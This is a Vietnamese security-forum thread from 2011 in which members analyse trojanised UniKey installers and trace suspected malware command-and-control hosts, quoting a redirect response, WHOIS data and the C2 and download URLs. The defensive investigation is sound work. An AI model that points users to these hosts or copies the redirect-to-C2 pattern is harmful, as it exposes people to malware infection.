Offline
[Profile] [PM]

conmale wrote:
Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)

đều y như nhau và đều là malware..

Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010.
Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006.

Cả ba bản trên có y hệt checksum và nội dung y hêt nhau.

Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.

 


Thằng này em chạy cũng sạch luôn, ko thấy sinh ra mấy cái folder với file .exe nào cả
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:30:44 (+0700) | #204 | 244322
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

rang0 wrote:

conmale wrote:

- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)
 


Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !? 


Lạ vậy? Anh download từ nguồn sourceforge ở trên, cái binary y hệt như từ trang nethoabinh.com. Không lẽ anh download bản bị cached ở đâu đó chớ không phải bản chính thức từ sourceforge?
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:39:08 (+0700) | #205 | 244323
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
@TQN

http://fastupdate.dyndns-office.com/

Emm có vào site này có thông báo

Code:
fastupdate.dyndns-office.com is offline

fastupdate.dyndns-office.com is currently offline. Please try again later.


Theo em host này đã đc cấu hình, nếu không đúng User-Agent nó sẽ wwwect sang cái thông báo trên

Còn cái thông báo đó chỉ để "lừa tình" mọi người thôi, mọi người sẽ nghĩ nó offline thật, vì theo em biết dyndns không hỗ trợ những thông báo như vậy
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 16:53:28 (+0700) | #206 | 244324
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Check từ http://fastupdate.dyndns-office.com/ nó ra cái này

Code:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.k9activewear.com/request.php?remote_socket=tcp://xxxxxxxxxxx">here</a>.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at 216.55.166.13 Port 80</address>
</body></html>


Check cái http://www.k9activewear.com

Code:
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited

Expiration Date: 2012-07-04
Creation Date: 2011-07-04
Last Update Date: 2011-07-04

Name Servers:
    ns77.domaincontrol.com
    ns78.domaincontrol.com
See k9activewear.com DNS Records

Information Updated: Wed, 27 Jul 2011 10:47:41 UTC


Creation Date: 2011-07-04 <-- Mới tinh luôn
Lại Prohibited hehe mấy anh này nguỵ trang kiểu ÚC rồi
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:06:51 (+0700) | #207 | 244325
lequi
Member

[Minus]    0    [Plus]
Joined: 29/04/2007 18:13:32
Messages: 77
Offline
[Profile] [PM]
@mv1098: Mình đã thử thay đổi User-Agent cho đúng với User-Agent mà "bọn" virus request, nhưng vẫn ra 1 kết quả đó. Vả lại trong quá tình capture packet, kết quả trả về vẫn giống với kết quả truy cập từ trình duyệt.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:13:45 (+0700) | #208 | 244326
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Mình vào thẳng ip http://204.13.248.126/ nó cũng thông báo như vậy, check port 80 vẫn thấy open

Có lẽ chủ host đã thay đổi User-Agent hoặc muốn giữ lại cái host này nên mới để thông báo như vậy chứ không tắt hẳn đi như mấy host khác
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 17:57:05 (+0700) | #209 | 244327
exception
Member

[Minus]    0    [Plus]
Joined: 10/07/2011 23:48:25
Messages: 15
Offline
[Profile] [PM]
Cái IP đó là của offline.mydyndns.org. Bọn STL dùng dynamic dns, giờ nó cho dịch vụ update dns dynamic off rồi, thì tụi dyndns nó báo wwwect về domain đó; hoặc nó wwwect DNS về đó, không có gì đặc biệt ở cái DNS này đâu.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 27/07/2011 19:40:50 (+0700) | #210 | 244330
ga_cum06
Member

[Minus]    0    [Plus]
Joined: 04/05/2008 19:01:15
Messages: 29
Offline
[Profile] [PM]

conmale wrote:

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi.
nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác

Các anh có ý kiến gì để làm việc hiệu quả hơn không 


Anh nghĩ có 3 mảng để lo:

1. RE.
2. Trace net và xác định mạng hoạt động của malware.
3. Report cho các nhóm antiviruses và các nhóm chức năng.

Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã. 


em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian smilie mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó smilie
Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất smilie smilie
...Ước mơ xây trường học cho trẻ em nghèo Việt Nam
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|